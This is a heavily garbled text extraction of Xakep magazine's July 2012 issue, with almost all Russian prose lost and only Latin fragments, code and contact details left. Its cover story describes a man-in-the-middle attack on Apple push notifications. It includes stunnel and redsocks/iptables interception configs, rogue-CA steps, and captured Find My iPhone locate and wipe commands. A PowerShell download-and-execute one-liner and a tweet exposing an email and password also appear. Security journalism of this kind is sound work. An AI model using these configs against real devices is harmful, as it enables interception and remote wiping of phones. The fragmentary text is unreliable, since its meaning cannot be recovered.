Хакер 2012 07 PDF

056
WWW.XAKEP.RU
-
highload
PHP-CGI
07 (162) 2012
: 230 .
018
, IOS

024

MAIL.RU GROUP
032

WINDOWS
076
SCALA?

'HOO

YourDellSolution.com/ru
Dell PowerVault
Dell EqualLogic
Dell Compellent
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)

PC_ZONE UNITS
UNIXOID SYN/ACK
MALWARE

PR-
step (step@real.xakep.ru)
(goltsev@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
gorl (gorlum@real.xakep.ru)

(vagizova@glc.ru)
DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-
(alik@glc.ru)

PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906

-

.: (495) 935-7034, : (495) 545-0906

, ,
.
. Google Street View .
. URL.
,
, . , ,
3-4 .

. , ,
, .
?
, ,

. , Android
, Google
GTalkService
.
Apple Push Notification Service iOS.
,
.
, ,
iPhone' ,
.
step, . . ][
twitter.com/stepah

TECHNOLOGY

CORPORATE
-
(zinaidach@glc.ru)
(filatova@glc.ru)
(polikarpova@glc.ru)
(melnikova@glc.ru)
(kachurin@glc.ru)
( )
(tatarenkova@glc.ru)
(bulanova@glc.ru)
(korenfeld@glc.ru)
(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)
:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002.
Scanweb, . 217 600 .
.
. ,
, . .
.

: content@glc.ru.
, , 2012
Content
014
HEADER
004
011
MEGANEWS

hacker tweets
-
10 60

WEBBY AWARDS 2012
016
017

LEGO
Proof-of-concept
Google reCAPTCHA 99,1%
COVERSTORY
024

Mail.Ru Group
COVERSTORY
018
iZombie,
SSL
iOS Wi-Fi-
110
116
PCZONE
032
036
040

Chocolatey
?

044
048
052
056
060
064
Easy-Hack

SMBRelay
SMBRelay Windows 7
VMware vCenter

PHP:
PHP-CGI
X-Tools

MALWARE
066
070
drive-by -

drive-by

-

094
UNIXOID
102
106
110
080
086
090
Scala-
Scala
,

Crypto++ RSA

,

GNOME: GTK+ GNOME Shell

suckless.org

, , Android
SYN/ACK
116
122
128

UTM-

nginx + PHP-FPM + test-cookie + geoip
+ Naxsi

Microsoft
132
Do Not Track

FERRUM
134
076
HighLoad. #1

!

Intel X79 Express
139
140
144
8,5
FAQ
FAQ
WWW2
web-
MEGANEWS
WE ARE THE CHAMPIONS
ACM-ICPC

2012 International Collegiate Programming Contest (ACMICPC). ,
, IBM,

.
ACM-ICPC, . : 8500 2219
85 , 112 ,
- ,
( ). 2004, 2008 2009 ,
.
,

.
IBM, .
, -

ACM-ICPC-2012 ,
. !

ACM-ICPC

. ,
, 37-

2013 .
10 YOTA
LTE.
14

LTE.
004
RIM BLACKBERRY 10,

QNX.
,

.

, ,
Symantec.
GOOGLE
oogle , ,
. ,
- ,
Street View ,
Wi-Fi ( , ).

. , .
IT- , , ,
,
. FCC Google
e-mail , .
Street View. ,
Wi-Fi .
SONY:

,
5,7 .
:
,
108 035 1800
!
WESTERN DIGITAL SCSI

Trade Association Technology
SSD- SAS,

12 /.
07 /162/ 2012
,
.
KYOCERA. , .
KYOCERA, FS-1135MFP
,
. ,
?
:
35 4
ECOSYS
,
KYOCERA. .
+7 (495) 741 00 04 www.kyoceradocumentsolutions.ru
KYOCERA Document Solutions www.kyoceradocumentsolutions.com
MEGANEWS
2012 , Sophos.
INTEL
INTEL -
Intel, ,

Raspberry Pi. Raspberry
Pi

,
iPad
.
, Intel ,
. PAX East,
-, NUC
(Next Unit of Computing), . 1010 !
VIA Pico-ITX, 107,2 ,
VIA Nano-ITX (1212 ). NUC
, Core i3/i5
Sandy Bridge Intel HD
3000 DDR3 (
SO-DIMM). NUC ,
. .
Thunderbolt, USB 3.0, 802.11 b/g/n HDMI.
NUC 100 .
.
MICROSOFT , CONFICKER
MICROSOFT
SECURITY INTELLIGENCE
REPORT,
2011
CONFICKER
1,7
006
PROOF-OF-CONCEPT

. TapLogger,
Android OS, ,

.

(, ).
, ,

.
, .
TapLogger ,
. - ,
.
TapLogger
.
,
PIN-.
PIN-

,
.
,

.
PIN-.
: ,
PIN-
10 000 .
TapLogger, 81
!
PIN-,
, TapLogger
729,
80%.

Android, . TapLogger ,

,
, Windows 8 BlackBerry
OS.
iOS-. : Android
,

, , .
: cse.psu.edu/~szhu/papers/
taplogger.pdf.
07 /162/ 2012
MEGANEWS
MICROSOFT Security Essentials 4.0.
TORRENT

CHROME
1
CHROME .
, Google
Chrome, . Google 20
2012 , ,
Chrome ,
.
StatCounter, Google Chrome
,
Firefox . ,
Microsoft Internet Explorer.
I
, . Chrome
, , 20
Google IE, , ! , IE
. 2011 43,9%
31,4%, Chrome ,
, 20% 32%.
, Chrome ,
- . , Internet Explorer
Chrome 30,9% 27,1%.
Microsoft
72,3% ( 86,9%,
).
:
Google Chrome
,
Opera.
CERT Torrent
( uTP) - .

, .
,
IP-.
uTP
. uTP
,
23 ! IP-
,
, ,
, , , .
. :

; -
;
; . ,
Pirate Pay.
Microsoft,
-,
-.

uTP
. ,

CERT.
2011:
183
UDP
(~0,2% )
2012:
957
047
UDP
(~45% )

iPhone.
200 .
VK
Messages ( VK)
21- .
Objective
C!
2,5 .
VK
Android.
008
2011 4,5
,

12,5 ,
Group-IB.

- The
Pirate Bay, ,
.
07 /162/ 2012
MEGANEWS
13 eMule eDonkey2000.
SAMSUNG GALAXY S III

SAMSUNG
Samsung Mobile Unpacked 2012,
, GALAXY S.
Super AMOLED 4,8
1280720 . : 8- ( BSI)
,
1,9- , HD- 30 .
Android 4.0 (Ice
Cream Sandwich).
. ,
Samsung Galaxy S III SC-06D Snapdragon S4 (
) 2 RAM,

Exynos 1 RAM.
Samsung . ,
16 32
, 64 .
microSD ( 64 ).
2,5G (GSM/GPRS/EDGE) 850/900/1800/1900 , 3G
(HSPA+ 21 /) 850/900/1900/2100
4G LTE.
Wi-Fi 802.11 a/b/g/n, GPS/
GLONASS, NFC Bluetooth 4.0 (LE). Samsung Galaxy S III
Wi-Fi Channel Bonding,
Wi-Fi.
2100 .
136,670,68,6 , 133 .
:
. ,
( ) -. ,
,
Samsung.
,
Apple . GALAXY S III Android 4.0 , ,
, .
:
, . S
Voice
, , , .
, , ,
: - ,

.
Smart stay
,
!
Android Beam S Beam, ,
Samsung Galaxy S III.
1 , 10 . ,
, , ,
. :)
5 .
GALAXY S III 16
29 990 .
,
.
KICKSTARTER PEBBLE E-PAPER

10

!
010
07 /162/ 2012
#hacker tweets
@mubix:
, ,
. #_
@cBekrar:
, Adobe , Photoshop, Illustrator

Flash Pro . http://bit.ly/J7Wr5U
@ruddy_ru:
:
.

VirtualBox' ,

. . :(
@jduck1337:
Adobe .
... ,

, .
Google
Chromium Blog: Fuzzing for Security
http://t.co/mAX3TTIn.
:

,
Google? .
@joshcorman:
,
@haroonmeer #ITWebSec
@davienthemoose:
@i0n1c:
Apple ID +
,

iCloud
.
CEH
- :(. ,
! #BsidesChicago
:
@ajitbtw:
@i0n1c ajitbtw@gmail.com Pass Ajit12345
CEH
. ,
!
:)
@msimoni:
,
Null.

... http://t.co/nuFcEL1K
:

. :)
@JohnLaTwC:
@i0n1c:
,

,
, .
:
@mwtracker:
CVE-2011-0611: Flash PDF

PDF
, .
:
, ?

www.surfpatrol.ru.
07 /162/ 2012
-2. ,
PHP
( .php?-s).
Apple,
iPad3.
, ,
Word , SEH
SHE.
:
(. SEH Structured Exception

Handling) Microsoft
Windows, ,
.
@MarkWuergler:
zero day.
- - , , , ,
, -.
011
MEGANEWS
FACEBOOK . 2012- 901 .
3D-

,
Cube 3D-
.

3D-
Solidoodle,

499 .

3D-. , , The
Pirate Bay ,
. :). , 3D- ,
,
. ,
3D- . 3D- Cube
CES 2012 Cubify.
(Plastic
Jet Printing, PJP). 141414 ,
, , 250
. (262634 ) 4,3 (
). Cube
Wi-Fi 802.11b/g. 1299 .
50 , ( ). ,
1314 .
2013 Ahlstrom
EasyLife,
.

Wi-Fi! :)
012

1525
VPN-,

Cybernorms.
VPN 40%.
GOOGLE

3133,7 20 000
.
PHP

-
CVE-20121823 PHP-CGI,
,
Reddit.
Eindbazen. , 2004
PHP - =
. CGI RFC, =

, . 2004
PHP ,

?-s URL PHP-
-s PHP-CGI. PHP ,
,
.
safe_mode, allow_url_include,
- ini. PHP Group PHP 5.3.12 PHP 5.4.2,
.
.
PHP: .
DVD
Windows
8
DVD Media
Player .
VLC Media Player Classic
!
APPLE ITUNES

(jailbreak).

:
j*******k.
07 /162/ 2012
SOPHOS, Mac Windows, Mac OS X.
MICROSOFT SKYPE
VOIP-
Microsoft VoIP Skype 8,5 .
,
, ,
Skype. , ,
:
,
. , Skype
P2P-: , , , ,
, .
,
.
48
, 800 .
Microsoft
. Immunity Security , Microsoft

Linux,
GRSecurity.
,
, Microsoft.
4100 ( 41 )
.
, -
Skype
. , ,

,

. , , -
P2P- ,
,
Skype , .
Skype, , Skype
5.5 , IP- ,
. , , Pastebin (pastebin.com/rBu4jDm8).
, , Microsoft
,
P2P-. , Microsoft ,
-.
- .
FOXCONN APPLE
FOXCONN
,

IPANEL (ITV)
07 /162/ 2012
013
MEGANEWS
2000 ICANN, ., ..
WEBBY AWARDS

-

( ). ,

.

.
Webby
Awards
16 . 10 60

2012 .
Webby Awards -,
. Webby - , -, ,

. .
Skype / (
). ,
Super 8
.
Evernote
. Dropbox :
- -.
Pinterest () Google+ ();
Pitchfork Pandora.
Webby Awards 2012 ,

: Instagram
, Facebook
.

,
,
.
, , , . ,
?
!
,
Pegasus Global Holdings
CITE, .
, ,
: ,
.
; -
-.
, , ,

: ,
, ,
. ,
Pegasus Global Holdings, - .

Firefox Chrome

. ,

,
,
SSL-.

.
, , -
.
014
NMAP 6
(NMAP.ORG/6),
3924
.
348,
Zenmap GUI.
DDR4
. Samsung
Hynix Micron
Technology .
07 /162/ 2012
APPLE: .
MICROSOFT

Apple
,
Windows 8

.

Microsoft,

.
Windows 8
, Microsoft
. , HomeOS ,
, , ,
, . , Microsoft
:
, . ,
HomeOS 48
12 . , , .
,
.
, C# .Net Framework 4.0 .
: ,
.
HomeStore,
,
HomeOS. ,
, Microsoft
.
, , , Microsoft.
,
Kinect. , Microsoft Research
SoundWave.
,
. ,
SoundWave . 1822 ,
,
. .
- ,
API-.
SoundWave ,
/ /,
. , :
90100% (
). ,
, SoundWave
Metro Windows 8,

.

NASDAQ,
-
FACEBOOK
30

07 /162/ 2012
015
HEADER

LEGO
GOOGLE BLOCKLY

, . bit.ly/
KPh7fO ,
.
Blockly Google. ,
( ,
) . Blockly
,
LEGO.

: , ,
if-then- ,
. ,
,
,

Scintific American 1986 :).
, Google Scratch.

(scratch.mit.
edu).
?
Blockly

Python, JavaScript
016
Blockly
Dart. ,
. : ,
, :).
, Blockly
-
, . , - :).
APP INVENTOR
Scratch, , . , App
Inventor (appinventoredu.mit.edu), , ,
- ,

Android.
WYSIWYG-
. ,
Scratch.

- .
,
Java-. , ,

, Google Play.
, Scratch, stencyl (www.stencyl.com).

,
2D-,
iOS (
iPhone iPad), Flash (
). :

Android HTML5.
,
.
.
,
?
:). z

Stencyl
07 /162/ 2012
Proof-of-Concept
GOOGLE RECAPTCHA
99,1%
?
,
- CAPTCHA.
, ,

. , , .
,
CAPTCHA API. , ,
reCAPTCHA (recaptcha.net).
,
,
, reCAPTCHA
.
.
, OCR-
, , .
, . : ,
,
(, 2009 Google).

Google Streets
View. :
. ,
Layer One DC949 (dc949.org)

Stiltwalker,
Google reCAPTCHA 99,1%.
:).
?
,
. , ,
reCAPTCHA , .
:
, .
,
, , . DC949?

(. ). ,
.
, reCAPTCHA
58 .
Open Source Hash (www.phash.org)
. ,
, 58 .

30%. . ,
50 reCAPTCHA
MD5,
99,1%- .
07 /162/ 2012

( Linux).
Stiltwalker Layer
(bit.ly/NAJ4Ja). 99,1%
reCAPTCHA,
. Stiltwalker
Google ,
reCAPTCHA . ,
, Stiltwalker
. z
017
COVERSTORY
(a2f3x7@gmail.com)
SSL
IOS
WI-FI-
018
iPhone
iPh
iPad
iP d
,
Apple. ,
,

. :
-
?
07 /162/ 2012
iZombie,
, iPhone/iPad. ,
, Apple .
, ,
. - , -

. , Apple,
, Apple ,
, . -,
Apple !
,
. - ,

. , : !
PUSH?
, iOS
. Apples Push Notification Service (APNs),
Push.
SSL ( payload
256 ) ,
Apple
. iOS ,
iPhone iPad
. ,
(CA) Apple
(, , ). iOS , ,
Apple , SSL- 5223-
. :
iOS , CA,
,
.
Apple , APNs . , ,
APNs iOS. .
SSL-
, , ,
.
, .
, iOS Apple
ACK- (0d 00 00 00 00 )
.
APNs? , ,
iOS. ,
. :
APNS iOS-
iPhone ( fmip, ). , , .
:

? , -, .
MITM-, Apple , CA, .
iPhone, :
1. .
2. SSH root.
3. CA.
4. private/var/Keychains nimble.
5. push-bin.crt
push-bin.key ( DER PEM).
6. stunnel :
{
"serverContext":{
"tapSendTS":"2012-05-08T18:55:36.668Z",
"tapSendContext":"fmip"
}
}
, , ,
Apple iCloud Find my
07 /162/ 2012
ACK- (0d 00 00 00 00), iOS
019
COVERSTORY
[apple_mitm_push_s]
accept = 0.0.0.0:5222
connect = 127.0.0.1:9500
cert = /home/attacker/CA/courier.push.apple.com.pem
# push-,
# CA
key = /home/attacker/CA/courier.push.apple.com.key
[apple_mitm_c]
cert = /home/attacker/CA/push-cert.pem
key = /home/attacker/CA/push-key.pem
# ,
# Apple
client = yes
accept = 0.0.0.0:9500
connect = 17.149.36.129:5223
# Push- Apple
, port-forwarding ( iptables
), 5223-
5222.
,
Push .
3 , .
IOS?
iOS, iPhone/iPad,
(
UNIX).

,
, ,
, ,
Security Server (securityd). ,
. , ,
Apple (, ), SQLite keychain-2.db,
020
3
.
securityd-
Apple.
securityd:
1. CA Apple,

keychain-2.db. Apple , .
iOS
.
2.

(CA).
CA, ,
CA .
, .
, , SSL-,
iOS ,
: . ,
.
CA IOS
iOS:
;
;
MDM (Mobile Device Management).
, MDM
. ,

, :
1. .
2. .
07 /162/ 2012
iZombie,
WWW
INFO

securityd Apple:
bit.ly/K1bAGs;
BLOBFORMAT:
bit.ly/K1bJtI;

Push Notification:
bit.ly/iCdRmd;

Notification Payload:
bit.ly/eVWx7j.

,

.

,
,

, udid
URL,

.
WARNING
,

,

,
.
!

. .
3. ~99% iOS .
Android
, Google

APNs , , ,

.
C2DM (Cloud to Device
Messaging Framework),

Android-
(bit.ly/nsvWcb).
, ,
-. redsocks (darkk.net.ru/redsocks)
:
! :)
. , iPhone Splashscreen
( , hotspot) ,
, ,
.

- .
, , Wi-Fi ,
( , , aireplay-ng
) , . :
1. .
2. splashscreen.
3. .
. .
, hotspot , SSL-
. ,
iPhone/iPad securityd, , ,
PayPal App Store
MITM ?
MITM-
, , :
1 CA c OpenSSL.
2. ( ChilliSpot,
www.chillispot.info). splashscreen
iPhone -
, iWebkit.
3. SSL-
07 /162/ 2012
base{log_debug = on; log_info = on; log = "file:/tmp/

reddi.log"; daemon = on; redirector = iptables;}
redsocks { local_ip = 0.0.0.0; local_port = 31337;
ip = 127.0.0.1; port = 31338; type = http-connect; }
iptables:
iptables -t nat -N REDSOCKS
iptables -t nat -A REDSOCKS -d 0.0.0.0/8 -j RETURN
iptables -t nat -A REDSOCKS -p tcp --destination-port \
443 -j REDIRECT --to-ports 31337
iptables -t nat -A REDSOCKS -p tcp --destination-port \
80 -j REDIRECT --to-ports 31339
iptables -t nat -A PREROUTING -i at0 -j REDSOCKS
, . (443
80) ,
( HTTP Burp
Proxy). HTTPS Redsocks (
, darkk
).
4. Redsocks Charles Proxy
(www.charlesproxy.com), 31338- .
,
, .
.
021
COVERSTORY
MITM-
,
.
! ! !
, ,
Push.
, ,
iPhone , . APNs-,
,
. Push- iOS
,
, :
{
"serverContext":{
"tapSendTS":"2012-05-08T18:55:36.668Z",
"tapSendContext":"fmip"
}
, SSL, !
, fmip
Find My iPhone. , iOS iCloud, HTTPS (
HTTP
).
POST- (
) (
):
App Store
{
"endThreshold": 10,
"ackURL": "https://p02-fmip.icloud.com:443/
fmipservice/findme/403955807/7be6fa307846b67
0f0346c00af720c347f5f1eb8/ackLocate",
"decayFactor": 0.7,
"desiredAccuracy": 40,
"startThreshold": 2000,
"locationValidityDuration": 120,
"id": "6df3ff6f-f365-499e-b921-93641206bffa",
"enqueueTimestamp": 1336505766732,
"cmd": "locate",
"includeTrackingInfo": false,
"overridenCommandDomain": null,
"locationTimeout": 120,
"findMyiPhone": true,
"responseTimeStamp": 1336505766732
{
"deviceInfo": {
"buildVersion": "9B176",
"aps-token": "285cdaffeb5f8767233ebdfe3a2df07
797ae864e586ce902c321f222f84d333",
"passcodeConstraintStr": "Enter a four-digit passcode.",
"deviceColor": "black",
"productVersion": "5.1",
"batteryLevel": 0.1292443,
"deviceName": "iPhone test",
"locationServicesEnabled": true,
"productType": "iPhone2,1",
"udid": "7beafa302d46b670f0657c00af720c347f5f1eb8",
"passcodeConstraint": "simple",
"deviceClass": "iPhone",
"batteryStatus": "Charging",
"passcodeIsSet": true
},
"serverContext": {
"tapSendContext": "fmip",
"tapSendTS": "2012-05-08T21:05:37.132Z"
},
"deviceContext": {
"deviceTS": "2012-05-08T21:05:38.210Z"
}
}
.
,
. : ? ,
iCloud. , ,
, iCloud
:
022
( ) :
{
"locationFinished": false,
"deviceContext": {
"cmdId": "6df56f6f-f445-499e-b921-93641006bffa",
"deviceTS": "2012-05-08T19:36:11.391Z"
},
"deviceInfo": {
"udid": "77be6fa307846b670f0346c00af720c347f5f1eb8"
},
"alt": 141.3043212890625,
"positionType": "Wifi",
"vertAcc": 10,
"longitude": 37.5862605508342,
"latitude": 55.72784808181711,
"statusCode": 200,
"timestamp": "2012-05-08T19:36:09.195Z",
07 /162/ 2012
iZombie,
"horizontalAccuracy": 71.1873037658878
"productType": "iPhone2,1",
"udid": "7beafa302d46bffff0346c00af720c347f5f1eb8",
"passcodeConstraint": "simple",
"deviceClass": "iPhone",
"passcodeIsSet": true
},
"message": "",
"statusMessage": "OK",
"verifyURL": "https:\/\/p02-fmip.icloud.com:443\
/fmipservice\/findme\/408888807\/0346c
7802d46b670f0346c00af720c347f5f1eb8\/wipeVerify",
"cmd": "wipe",
"pin": "",
"cmdContext": {
"ackURL": "https:\/\/p02-fmip.icloud.com:443\
7802d46b670f0346c00af720c347f5f1eb8\/ack",
"message": "",
"id": "06c0a5f9-5126-4428-b875-59acbb956714",
"verifyURL": "https:\/\/p02-fmip.icloud.com:443\
7802d46b670f0346c00af720c347f5f1eb8\/wipeVerify",
"cmd": "wipe",
"responseTimeStamp": 1336510929032,
"pin": "",
"overridenCommandDomain": null
},
"statusCode": 200
GPS-,
? :)
wipe, . ,
,
:
{
"message": "",
"id": "06c0a5f9-5126-4428-b875-59acbb956714",
"cmd": "wipe",
"pin": "",
"ackURL": "https://p02-fmip.icloud.com:443/
fmipservice/findme/408888807/0346c
a302d46b670f0346c00af720c347f5f1eb8/ack",
"verifyURL": "https://p02-fmip.icloud.com:443/
fmipservice/findme/408888807/0346c
7802d46b670f0346c00af720c347f5f1eb8/wipeVerify"
}
, 408888807/0346c 7802d4
6b670f0346c00af720c347f5f1eb8/ URL ( ,
). id
: - , . ,
,
verifyURL :
{
"id": "06c0a5f9-5126-4428-b875-59acbb956714",
"ackURL": "https:\/\/p02-fmip.icloud.com:443\/
fmipservice\/findme\/408888807\/0346c
7802d46b670f0346c00af720c347f5f1eb8\/ack",
"deviceContext": {
"deviceTS": "2012-05-08T21:05:39.604Z"
},
"deviceInfo": {
"buildVersion": "9B176",
"aps-token": "285cda0ffeb5ff767233ebdfe3a4df07
797ae864e586ce902c321f222f84d333",
"passcodeConstraintStr": "Enter a four-digit passcode.",
"deviceColor": "black",
"productVersion": "5.1",
"batteryLevel": 0.1292443,
"locationServicesEnabled": true,
,
IOS

07 /162/ 2012
200 ( 200 HTTP--,

), iOS , , !
: wipe iPhone,
soft reset . ,
, .
- ,
iCloud.
. ?

Apple, .
, :
1. . ,
wipe locate .
2. (
).
3. .
,

, . 1001- :
, , , . Apple, , ,
,

- ,
. ? z
023
COVERSTORY
0000000000
Mail.Ru
01 .
20
2005
,
Mail.Ru Group.

c OS X
Ma .
.

,
C 6 0 23-00.
11-0
MAIL.RU

Mail.Ru , - .
, , -.
, . Mail.Ru UNIX, Mail.Ru Group
, .
024
07 /162/ 2012
MAIL.RU
60 200 .

. . , ,
, .
Mail.Ru , .
, .
,
, , , 2005
.
Mail.Ru
60 200 .

, .
, .
,
. - ,
. ,
.
, .
,
-
. ,
,
.
11 , 8 .
,
,

, .
-
. ,
,
. ,
,
, ,
,
.
,
.
, ,
.
, , ,
.
, ,
, ,
,
, -
.

.
.

.
-
,
.
.
, .
. :)
R&D
. ,
, ,
.
/
, .
.

.
:
,
,
/++. Perl
, , , C. Python
- Ruby.

Perl , ,
. , .
Perl-.
, ,
. ,
. Perl,
.
.
MAIL.RU GROUP
.
, .

, .
2003 . ,
ICQ,
,
, , .
ICQ?
.
, ,
ICQ .
,
Mail.Ru ( , ,
, IT-).
, ICQ,
, Mail.Ru Group.

. -
07 /162/ 2012
Mail.Ru
025
COVERSTORY
Mail.Ru Group :)
:
.
commit ( ),

( )
.

,
. -
,
,
. , ,
,
.
,
, .
,
, , -
.
, Open
Source Linux. ,
,
- .

, Open Source

, .
,
, , .
, .
026

- . . , ,

,
. , ,
- nginx, .
. Mail.Ru
Group -
, ,
.
. Hadoop
Hbase , . ,
,
.

. -
Mail.Ru ,
07 /162/ 2012
Mail.Ru Group
Sound Team
:
( ),
,
. , .
, ,
Open Source Tarantool. , ,
. , ,

.
, ,
,
- , .
key-value storage,
,

.
Tarantool key-value .
,

,
.
, ,
.
,
.
, .
07 /162/ 2012
Open Source ?
, .

.
, , .
, MySQL. ,
Open Source . - ,

. , ,
, , .
MySQL Open Source
: , . .

-,
. , ,
- .
: - ,
.

. ,
-
.
- ,
,
( ).
Mail.Ru Group
,
280 /. ,
, , , ,
. -.
.
, ,
.
, .
, .
, 24
,
.
-, ,
. ,
, .
, ,
,
,
, .
.
,
,
. , ,
, , ,
Ethernet
, .
,
.
, setup

.
() . ,
.
,
OPEN SOURCE ,
027
COVERSTORY
,
. ,

Ethernet.

Futubra .
, .
,
. , , (
, Mail.Ru Group ),
-
, .
,
: . ,
,
.
. Futubra ,
,
.
, Mail.Ru Group
. .

, .
MySQL,
NoSQL Tarantool.
, nginx Apache,
fork Exim, ,
DNS-. ,
, .
,
.
, ;
-,
. ,
. ,
,
. 13
,
. , ,
,
c .

, . ,
, ,
. . ,

, .
, Linux IPVS. -,
( :
Mail.Ru Group ). -,
.
,
.

, Instant
Messenger. ,

.
150 000 , . ,
.
Mail.Ru
,
. , - ,
.

, , -
, . .
, ,
: , ,
. ,
.
,
.
, - ,
.
MAIL.RU GROUP
@Mail.ru

,
,
DDOS'
028
DDoS, ,
.
DDoS, , .
,
,
.

, ;
, .
, ,
.
, . ,

.
07 /162/ 2012
Mail.Ru Group
,
, ,
. , ,
. IDS,
.
, ,
. , . ,

,
. ,
,
, .

production-. ,
, . ,
- ,
- ,
, ,
.
,
penetration testing.
-
- . ,
. ,
,
, .
MAIL.RU GROUP
,
Mail.Ru Group.
, , ,
,
IT-, .
,
. ,
:).
- :)
,
. , .
, .
, 1011 .
, . , 24
, ,
, ,
, , .
.
, ,
- , .

. , , . ,
,
. ,
.
Mail.Ru Group .
, . , .

, . ,
, .
IT-

IT-. ,
, , IT-,
,
IT-.
,
.
07 /162/ 2012
,
. ,
. , IT-
, Mail.Ru
Group
.
:
. .
, , ,
IT-
.
,
.
,
, .
: Russian Code Cup. ,
,

,
,
, IT-.
,
,
.
: . ,
. :
, .
,
- . ,
.
20 UNIX- , Kris Buytaert, Garrett Honeycutt,
Joshua Thiessen, , ,
Mail.Ru Group. z
029
Preview
26 .
.
60
PHP-CGI
Ruby, Python

,
- - PHP.

,
, , -
, .

,
.
,
, PHP
CGI.
PC ZONE
32

Microsoft
,

Chocolatey.
36
?

RapidShare
.
030
MITM,

.

.
SVN, Git, Mercurial.
MALWARE
SMBRELAY
52
40
56
VMWARE VCENTER
, ,
.
66
: ?
-

drive-by-download
.
07 /162/ 2012
PC ZONE
anatooly, - (anatooly@gmail.com)

CHOCOLATEY
,

Linux
Microsoft Windows.

,
.
,
. , Chocolatey.
032
, Windows?
, .
,
- . , , - (, ),
. , ( ). ,
. ,

.
.
,
. Linux-
: , !. ,
07 /162/ 2012
,
.NET Framework 4.0 PowerShell 2.0. ,
. 7-Zip:
MICROSOFT

,
CHOCOLATEY
cinst 7zip
, . . , , ,
, Chocolatey. , :
.
, , , ,
.
,
, .
cinst
.
(
). Ubuntu apt-get ,
.
Microsoft
( , , - Windows 8),

Chocolatey (www.chocolatey.org).

Chocolatey . ,
:

, , Chocolatey.
, (chocolatey install/update/list),
(cinst/cup/clist). :
@powershell -NoProfile -ExecutionPolicy unrestricted \

-Command "iex ((new-object net.webclient).
DownloadString('http://bit.ly/psChocInstall'))"
CHOCOLATEY

Kindle:
PDF:
Sublime Text 2
Notepad++
07 /162/ 2012
PHP
Foxit Reader
Ruby
PDFCreator
Python
Inkscape
FTP-:
Calibre
Adobe Reader
Dropbox
Programmers
Notepad
Notepad2
FileZilla
Node.js
Hg
TortoiseHg
MySQL
WinRAR
KeePass
VLC
TortoiseGit
MongoDB
7-Zip
Evernote
foobar2000
PostgreSQL
SQL Server
Express
Skype
SQLite
033
PC ZONE
1. . :
cinst dropbox
SSH- Windows PuTTY

:
chocolatey install putty
chocolatey install putty -version 0.61
:
chocolatey install putty -source c:\somefolder
chocolatey install putty -source \\someserver\someshare
chocolatey install putty -installArgs "/qb" -override
2. . Chocolatey
:
cup dropbox
:
chocolatey update all
3. .
:
clist dropbox

:
chocolatey /?
?
, Chocolatey
NuGet.
.NET-,
. Chocolatey ,
. Chocolatey, NuGet.exe,
, ,
. -
cURL, curl.nuspec
: Install-ChocolateyInstallPackage, Install-Get-ChocolateyUnzip,
ChocolateyDesktopLink ,
, , .
, ,
:
1. C:\Chocolatey\lib.
2. , Chocolatey
( path),

.
3.
chocolateyInstall.ps1. ,
:

PowerShell. , (
), .
4.
-, .
, , .
,
UAC.
. , -
WINDOWS

,

.

Windows
, Windows 8 ,
.
034
Ninite
ninite.com

. :
,

,
.

.
Allmyapps
allmyapps.com
,
15 -.
.
,

. ,
-
,
.
07 /162/ 2012
,
( ).
, , . (,
), .
C:\Chocolatey\lib.
WWW

:
chocolatey.org;

Apache-:
github.com/chocolatey/chocolatey;

:github.com/
ferventcoder/nugetpackages.

Chocolatey . ,
. , ,
, .
-
.NUPKG. XML- ( .NUSPEC) tools (
chocolateyInstall.ps1) , .
cURL.

curl.nuspec.
. tools
cURL (libcurl.dll,
libssl32.dll) curl.exe.
:
INFO
PuTTY
.

\S,
\quite.
nuget pack
curl.7.25.0.nupkg

. , :
C:\Chocolatey\lib\curl.7.25.0 .
Chocolatey.
Chocolatey apt-get Windows. ,

Chocolatey ,
. ,
,
IDE,
. -
CoApp
coapp.org
,
Microsoft,
, Open Source .
CoApp
, ,
.
, , .
07 /162/ 2012
Chocolatey NuGet
, Chocolatey
,
. ,
-
. , ? , ! z
ZeuAPP
zeusoft.net/products/zeuapp
,
,
.

ZeuAPP ,
, , .
SUMo
kcsoftwares.com
Software Update Monitor, .
SUMo

(, ) .
, ,
, .
035
PC ZONE
, - (yani@yani.ru)
.

, .
, ,
Nekaka.com.
036
:

(rapidshare.com).
, .
.
: YouSendIt,
SendSpace, DepositFiles.
Dropbox, ( ),
. Dropbox
Google Drive Microsoft SkyDrive. -
07 /162/ 2012
Nekaka.com

, , , .
, , .

- .
(
)
, ,
( ),
. Dropboxe ,
.
-
Dropbox ,
(

).
, Dropboxe
,
, , .
?
, ,
Dropbox zalil.ru,
,
.
: , ,

. ,

, , , . ,
,
. ,
.
, Yahoo,
Hotmail AOL, .
:
.
Xenon
X3430 / 8 / 2200 Raid1 (Serverclub.
com/R210), .
Apache,
.
( ).

:
omploader, Jyraphe, FileZ, XtraFile.
.
( ,
2 ),

(
,
Upload ).
.

youdo.ru
.
nekaka.com.
,
.
(
Yahoo, Google Badoo?). ,
,
, .

. -
600 $;
1800 $;
1500 / 1800 $;
4200 $.
-:
33%;
800;

200 (1200 $ ).
100%,
07 /162/ 2012
600 + 1800*3 = 6000 $

1200*3 = 3600 $ .

2400 $
, .
:). -,
3000 -.
-,

( Dropbox)

( RapidShare). ,
,
, .
, /

.
( 1200 $)

.

;
-
,
, .
, ,
.
037
PC ZONE

. : ,
! ,
.
: 3000
. ,
!
Dropbox,
, Megaupload,
Hotfile
, ,
,
, .

,
,

( ). , .
,
. .
,

. , -,
( : --,
,
- ,
). -,
.

teamleada,
,
.
. ,
,
freelance.ru.
, : , , ,
,
.
1000 .
50 000 ,
242
T
( ).
. 10 ,

.
- ,
,

(
, 510 ,
- 100 ).
038
800 /,

,
.

:
1. .
DropArea,
.
,
( , ).
, ,
My files,
.
2. e-mail.
username@
upload.nekaka.com,
nekaka-.

e-mail.
,
, , - ,

.
.
3. torrent.
torrent,
,
,
.
- ,
.
, 10-
.
4. FTP.
e-mail,
,
. FTP-
.
.
, -
My Files Nekaka.
com, ,
.
.
?

SAMBA FTP
, ,
, .
,

.
Windows Mac OS X,
,
,

:). iOS Android.

must. 40%

. .
API,

.
,
, , , ,
. - Nekaka API,
.
, ,
- ,

.

1000 ,
